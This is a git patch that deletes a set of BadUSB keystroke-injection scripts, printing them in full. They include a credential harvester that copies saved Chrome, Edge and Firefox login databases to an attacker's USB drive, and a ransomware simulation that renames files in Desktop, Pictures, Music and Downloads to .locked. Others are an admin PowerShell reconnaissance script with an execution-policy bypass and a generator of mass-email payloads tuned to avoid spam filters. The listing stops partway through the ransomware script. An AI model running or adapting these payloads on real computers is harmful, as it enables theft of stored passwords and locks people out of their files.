From a051c3a3dc98da0ddd05138fbf1890249a0d33e8 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 16:29:49 -0400
Subject: [PATCH] Delete BadUSB/MarkCyber-BadUSB directory
---
 .../MarkCyber-BadUSB/Emails/EmailSender.txt | 41 --
 .../Emails/GenerateEmailSend.py | 101 ---
 .../HackerStuff/CredentialHarvester.txt | 54 --
 .../HackerStuff/VulnerabilityScanner.txt | 630 ------------------
 .../RansomwareSimCleanup.txt | 62 --
 .../RansomwareSimMain.txt | 91 ---
 6 files changed, 979 deletions(-)
 delete mode 100644 BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt
 delete mode 100644 BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSend.py
 delete mode 100644 BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt
 delete mode 100644 BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt
 delete mode 100644 BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt
 delete mode 100644 BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt
diff --git a/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt b/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt
deleted file mode 100644
index f484d3ec..00000000
--- a/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt
+++ /dev/null
@@ -1,41 +0,0 @@
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%
-REM %%%%%%%%%%%% This script is intended to send an email via badUSB (into your logged in gmail on chrome) %%%%%%%%%%%%
-REM %%%%%%%%%%%% This script will open chrome, send an email, and then close chrome. Must be logged in to email %%%%%%%%%%%%
-REM %%%%%%%%%%%% You can use python to replicate this script by changing email addresses & name every time %%%%%%%%%%%%
-REM %%%%%%%%%%%% The python script in section 2.1 generates badusb scripts for multiple emails if need be %%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-DELAY 1000
-GUI r
-DELAY 500
-STRING chrome
-ENTER
-DELAY 1000
-STRING https://mail.google.com/mail/u/0/#inbox?compose=new
-ENTER
-DELAY 5000
-DELAY 1000
-STRING {EMAIL ADDRESS YOU WANT TO SEND EMAIL TO}
-DELAY 500
-TAB
-TAB
-STRING {YOUR SUBJECT NAME}
-TAB
-STRING Hi {THEIR NAME}
-ENTER
-ENTER
-STRING {CONTENTS OF THE EMAIL}
-ENTER
-ENTER
-STRING {IF YOU WANT A SECOND PARAGRAPH, THIS IS WHAT DOUBLE-ENTER ABOVE DOES}
-ENTER
-ENTER
-STRING Respectfully,
-ENTER
-ENTER
-STRING {YOUR NAME}
-ENTER
-CTRL ENTER
-DELAY 5000
-DELAY 1000
-ALT F4
diff --git a/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSend.py b/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSend.py
deleted file mode 100644
index 16662391..00000000
--- a/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSend.py
+++ /dev/null
@@ -1,101 +0,0 @@
-#######################################################################################################################################
-#######################################################################################################################################
-################# This script was created by github.com/MarkCyber (w/ assistance of ai) ####################
-################# This is a python script to automatically create BadUSB scripts to auto send emails ####################
-################# This takes a excel sheet with the columns named "Names" and "Emails" ####################
-################# This script will then make a badusb script using the name + email of each person ####################
-################# There are various subject options that will be chosen from, to minimize "spam" ####################
-################# Change the signature to your name, and put subject options that fit your email ####################
-################# Lastly, of course make sure to change the contents of the email to what you want ####################
-#######################################################################################################################################
-#######################################################################################################################################
-
-import pandas as pd
-import random
-
-# Load the Excel file, make sure it has the same name (or change the name in this script)
-file_path = 'NameAndEmails.xlsx'
-data_df = pd.read_excel(file_path)
-
-# Your excel should have 2 columns. Names, and Emails.
-data_cleaned_df = data_df[['Names', 'Emails']].dropna().reset_index(drop=True)
-data_cleaned_df.columns = ['Name', 'Email']
-
-# List of placeholder subject options. Change these to 7 similar subjects that match your email (if you are sending many. You can use the same if not)
-subject_options = [
- "Placeholder for subject option 1",
- "Placeholder for subject option 2",
- "Placeholder for subject option 3",
- "Placeholder for subject option 4",
- "Placeholder for subject option 5",
- "Placeholder for subject option 6",
- "Placeholder for subject option 7"
-]
-
-# Placeholder for email body template. The name field will be filled from the "names" section in the excel sheet you provided.
-# Just modify the actual email body and sender name to fit your needs
-email_body_template = """
-Hi {name},
-
-Placeholder for email body.
-
-Warm Regards,
-Sender Name
-"""
-
-# Function to generate BadUSB script
-def generate_badusb_script_with_placeholders_single_file(data_df):
- script_template = [
- "DELAY 1000",
- "GUI r",
- "DELAY 500",
- "STRING chrome",
- "ENTER",
- "DELAY 1000",
- "STRING https://mail.google.com/mail/u/0/#inbox?compose=new", # In chrome it opens gmail to compose an email. This is why you must be logged in.
- "ENTER",
- "DELAY 5000"
- ]
-
- scripts = script_template
-
- for index, row in data_df.iterrows():
- name = row['Name']
- email = row['Email']
- subject = random.choice(subject_options)
- random_delay = random.randint(10000, 25000)
-
- email_body_lines = email_body_template.format(name=name).strip().split('\n')
- email_body_lines = [f"STRING {line.strip()}" for line in email_body_lines if line.strip()]
-
- email_script = [
- "DELAY 1000",
- f"STRING {email}",
- "DELAY 500",
- "TAB",
- "TAB",
- f"STRING {subject}",
- "TAB"
- ] + email_body_lines + [
- "ENTER",
- "CONTROL ENTER",
- "DELAY 5000",
- f"DELAY {random_delay}", #random delay so emails are not sent at the sames, ideally minimizing the potential to be marked as spam
- "ALT F4"
- ]
-
- scripts += email_script
-
- return "\n".join(scripts)
-
-# Generate the BadUSB script with placeholders and proper send command in a single file
-final_script_with_placeholders = generate_badusb_script_with_placeholders_single_file(data_cleaned_df)
-
-# Save the script to a file
-final_script_file_path = 'final_script_with_placeholders.txt' #This would be your badusb script
-with open(final_script_file_path, 'w') as file:
- file.write(final_script_with_placeholders)
-
-print(f"Script saved to {final_script_file_path}")
-
-#check out github.com/markcyber for more badusb / pen testing / automation tools and scripts
diff --git a/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt b/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt
deleted file mode 100644
index d7a27cea..00000000
--- a/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt
+++ /dev/null
@@ -1,54 +0,0 @@
-REM ##################################################################################################################
-REM ############## This script was created by github.com/markcyber ##############
-REM ############## This script requires a secondary USB named "MYUSB" to save credentials to ##############
-REM ############## The extracted data will require decryption ##############
-REM ##################################################################################################################
-REM Open PowerShell
-DELAY 1000
-GUI r
-DELAY 500
-STRING powershell
-DELAY 500
-ENTER
-DELAY 1000
-REM Check if the USB drive exists
-STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter;
-STRING if ($usbDrive -ne $null) {
-ENTER
-DELAY 500
-STRING cd $usbDrive;
-ENTER
-DELAY 500
-STRING mkdir BrowserData;
-ENTER
-DELAY 500
-STRING cd BrowserData;
-ENTER
-DELAY 500
-REM Copy Chrome Login Data to USB
-STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data";
-STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; }
-ENTER
-DELAY 500
-REM Copy Firefox Login Data to USB
-STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\";
-STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; }
-ENTER
-DELAY 500
-REM Copy Edge Login Data to USB
-STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data";
-STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; }
-ENTER
-DELAY 500
-STRING }
-ENTER
-DELAY 500
-REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
-STRING echo off | clip
-ENTER
-DELAY 500
-REM Close PowerShell
-STRING exit
-ENTER
-DELAY 500
-REM Check out Github.com/MarkCyber for more badusb scripts and other hacky stuff
diff --git a/BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt b/BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt
deleted file mode 100644
index 51e1b0d0..00000000
--- a/BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt
+++ /dev/null
@@ -1,630 +0,0 @@
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% This script acts as a plug-in vulnerability scanner. Only use with permission %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% This will require a secondary USB named as "MYUSB" to save all information onto %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% This will find information on the following and save results in a results.txt file %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% Info on: password policy, audit services, network settings, softwares and versions, CVEs %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% Info on: open ports, firewall status, antivirus status, smbv1 status, missing updates & more %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-DELAY 1000
-REM Open Start Menu
-CONTROL ESCAPE
-DELAY 2000
-STRING powershell
-REM Navigate to the context menu to run PowerShell as an administrator
-DELAY 500
-RIGHTARROW
-DELAY 100
-DOWNARROW
-DELAY 100
-ENTER
-DELAY 3000
-ALT Y
-DELAY 5000
-REM Set PowerShell Execution Policy to Bypass
-DELAY 1000
-STRING set-executionpolicy bypass -scope process -force
-DELAY 200
-ENTER
-DELAY 200
-REM Create the PowerShell script in memory and execute it
-DELAY 200
-STRING $usbName = "MYUSB"
-DELAY 200
-ENTER
-DELAY 200
-STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter
-DELAY 200
-ENTER
-DELAY 200
-STRING if ($usbDrive) {
-DELAY 200
-ENTER
-DELAY 200
-STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName
-DELAY 200
-ENTER
-DELAY 200
-STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner
-DELAY 200
-ENTER
-DELAY 200
-STRING New-Item -ItemType Directory -Path $directoryPath
-DELAY 200
-ENTER
-DELAY 200
-STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt"
-DELAY 200
-ENTER
-DELAY 200
-STRING "" > $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING function check-passwordpolicy {
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING net accounts
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error checking password policy: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING function audit-services {
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING get-service | select-object name, displayname, status, starttype
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error auditing services: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING function check-networksettings {
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING get-netipconfiguration
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error checking network settings: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING function check-softwarevulnerabilities {
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error checking software vulnerabilities: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING function check-cve {
-DELAY 200
-ENTER
-DELAY 200
-STRING param (
-DELAY 200
-ENTER
-DELAY 200
-STRING [string]$productname,
-DELAY 200
-ENTER
-DELAY 200
-STRING [string]$version
-DELAY 200
-ENTER
-DELAY 200
-STRING )
-DELAY 200
-ENTER
-DELAY 200
-STRING $initialDelay = 2
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"
-DELAY 200
-ENTER
-DELAY 200
-STRING start-sleep -seconds $initialDelay
-DELAY 200
-ENTER
-DELAY 200
-STRING $response = invoke-restmethod -uri $uri -method get
-DELAY 200
-ENTER
-DELAY 200
-STRING if ($response.totalresults -gt 0) {
-DELAY 200
-ENTER
-DELAY 200
-STRING foreach ($cve in $response.result.cve_items) {
-DELAY 200
-ENTER
-DELAY 200
-STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING } else {
-DELAY 200
-ENTER
-DELAY 200
-STRING "no cves found for $productname $version"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error checking CVEs: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING if ($_.Exception -match '403') {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..."
-DELAY 200
-ENTER
-DELAY 200
-STRING start-sleep -seconds 60
-DELAY 200
-ENTER
-DELAY 200
-STRING $retryResponse = invoke-restmethod -uri $uri -method get
-DELAY 200
-ENTER
-DELAY 200
-STRING if ($retryResponse.totalresults -gt 0) {
-DELAY 200
-ENTER
-DELAY 200
-STRING foreach ($cve in $retryResponse.result.cve_items) {
-DELAY 200
-ENTER
-DELAY 200
-STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING } else {
-DELAY 200
-ENTER
-DELAY 200
-STRING "no cves found for $productname $version"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING function analyze-logs {
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING get-eventlog -logname system -newest 100
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error analyzing logs: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING function check-openports {
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING netstat -an
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error checking open ports: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING function check-missingupdates {
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Checking Windows Update logs..."
-DELAY 200
-ENTER
-DELAY 200
-STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log"
-DELAY 200
-ENTER
-DELAY 200
-STRING Get-WindowsUpdateLog -LogPath $updateLogPath
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "WindowsUpdate.log written to $updateLogPath"
-DELAY 200
-ENTER
-DELAY 200
-STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error getting Windows Update log: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING function check-firewallstatus {
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING netsh advfirewall show allprofiles
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error checking firewall status: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING function check-smbv1status {
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING get-windowsoptionalfeature -online -featurename smb1protocol
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error checking SMBv1 status: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING function check-antivirusstatus {
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING get-mpcomputerstatus
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error checking antivirus status: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING check-passwordpolicy >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING audit-services >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING check-networksettings >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING check-softwarevulnerabilities >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING analyze-logs >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING check-openports >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING check-missingupdates >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING check-firewallstatus >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING check-smbv1status >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING check-antivirusstatus >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-REM Dynamically identify critical software from running processes and scheduled tasks
-STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique
-DELAY 200
-ENTER
-DELAY 200
-STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique
-DELAY 200
-ENTER
-DELAY 200
-REM Combine running software and scheduled tasks
-STRING $softwareList = @()
-DELAY 200
-ENTER
-DELAY 200
-STRING foreach ($process in $runningSoftware) {
-DELAY 200
-ENTER
-DELAY 200
-STRING $softwareList += $process.Name
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING foreach ($task in $scheduledTasks) {
-DELAY 200
-ENTER
-DELAY 200
-STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun)
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-REM Remove duplicates and empty entries
-STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" }
-DELAY 200
-ENTER
-DELAY 200
-REM Check CVEs for identified software
-STRING foreach ($software in $softwareList) {
-DELAY 200
-ENTER
-DELAY 200
-STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion
-DELAY 200
-ENTER
-DELAY 200
-STRING if ($version) {
-DELAY 200
-ENTER
-DELAY 200
-STRING check-cve -productname $software -version $version >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10)
-DELAY 200
-ENTER
-DELAY 200
-STRING start-sleep -seconds $initialDelay
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Results saved to USB drive."
-DELAY 200
-ENTER
-DELAY 200
-STRING } else {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error: USB drive MYUSB not found."
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING invoke-command -scriptblock $script
-DELAY 200
-ENTER
-DELAY 20000
-REM check out github.com/markcyber for more badusb/pen testing scripts and tools
diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt
deleted file mode 100644
index 3be26299..00000000
--- a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt
+++ /dev/null
@@ -1,62 +0,0 @@
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% This is a follow-up script to the RansomwareSimulation %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% Running this renames all extensions back to their original, full path- making them usable %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% This can be ran multiple times if necessary %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-DELAY 1000
-GUI r
-DELAY 2000
-STRING powershell
-ENTER
-REM increased delays to make sure each command can go through even on slower computers
-DELAY 6000
-REM Define the locations using correct SpecialFolder enumerations
-STRING $folders = @(
-DELAY 1000
-ENTER
-DELAY 1000
-STRING [System.Environment+SpecialFolder]::Desktop,
-DELAY 1000
-ENTER
-DELAY 2000
-STRING [System.Environment+SpecialFolder]::MyPictures,
-DELAY 1000
-ENTER
-DELAY 2000
-STRING [System.Environment+SpecialFolder]::MyMusic,
-DELAY 1000
-ENTER
-DELAY 2000
-STRING [System.Environment+SpecialFolder]::Downloads
-DELAY 1000
-ENTER
-DELAY 2000
-STRING )
-DELAY 1000
-ENTER
-DELAY 3000
-REM Iterate over each location
-STRING foreach ($folder in $folders) {
-DELAY 1000
-ENTER
-DELAY 1000
-STRING $path = [Environment]::GetFolderPath($folder)
-DELAY 1000
-ENTER
-DELAY 4000
-REM Get all .locked files in the path and rename them back
-STRING Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') } | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name -replace '\.locked$', '') }
-DELAY 2000
-ENTER
-DELAY 5000
-STRING }
-DELAY 1000
-ENTER
-DELAY 4000
-STRING exit
-DELAY 1000
-ENTER
-REM Check out github.com/MarkCyber for more badusb scripts, malware and pen testing stuff
diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt
deleted file mode 100644
index b35bd533..00000000
--- a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt
+++ /dev/null
@@ -1,91 +0,0 @@
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% This script simulates a ransomware attack by changing file extensions and displays a message %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% Renaming file extensions renders each file unusable until the proper extension is added %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% Run (1.1)RansomwareSimulationCleanup to revert the changes and renaming of extensions %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-DELAY 1000
-GUI r
-DELAY 1000
-REM opens powershell (this is for windows machines)
-STRING powershell
-ENTER
-DELAY 3000
-REM Define the locations using correct SpecialFolder enumerations
-STRING $folders = @(
-DELAY 500
-ENTER
-DELAY 500
-STRING [System.Environment+SpecialFolder]::Desktop,
-DELAY 500
-ENTER
-DELAY 500
-STRING [System.Environment+SpecialFolder]::MyPictures,
-DELAY 500
-ENTER
-DELAY 500
-STRING [System.Environment+SpecialFolder]::MyMusic,
-DELAY 500
-ENTER
-DELAY 500
-STRING [System.Environment+SpecialFolder]::Downloads
-DELAY 500
-ENTER
-DELAY 500
-STRING )
-DELAY 500
-ENTER
-DELAY 500
-REM Iterate over each location
-STRING foreach ($folder in $folders) {
-DELAY 500
-ENTER
-DELAY 500
-STRING $path = [Environment]::GetFolderPath($folder)
-DELAY 500
-ENTER
-DELAY 500
-REM Get all files in the path and rename them
-STRING Get-ChildItem -Path $path -File | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name + '.locked') }
-DELAY 500
-ENTER
-DELAY 500
-STRING }
-DELAY 500
-ENTER
-DELAY 2000
-REM Display ransomware message
-STRING Add-Type -AssemblyName PresentationFramework
-DELAY 500
-ENTER
-DELAY 500
-STRING $Window = New-Object System.Windows.Window
-DELAY 500
-ENTER
-DELAY 500
-STRING $Window.WindowStartupLocation = 'CenterScreen'
-DELAY 500
-ENTER
-DELAY 500
-STRING $Window.WindowState = 'Maximized'
-DELAY 500
-ENTER
-DELAY 500
-STRING $Window.Topmost = $true
-DELAY 500
-ENTER
-DELAY 500
-STRING $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'
-DELAY 500
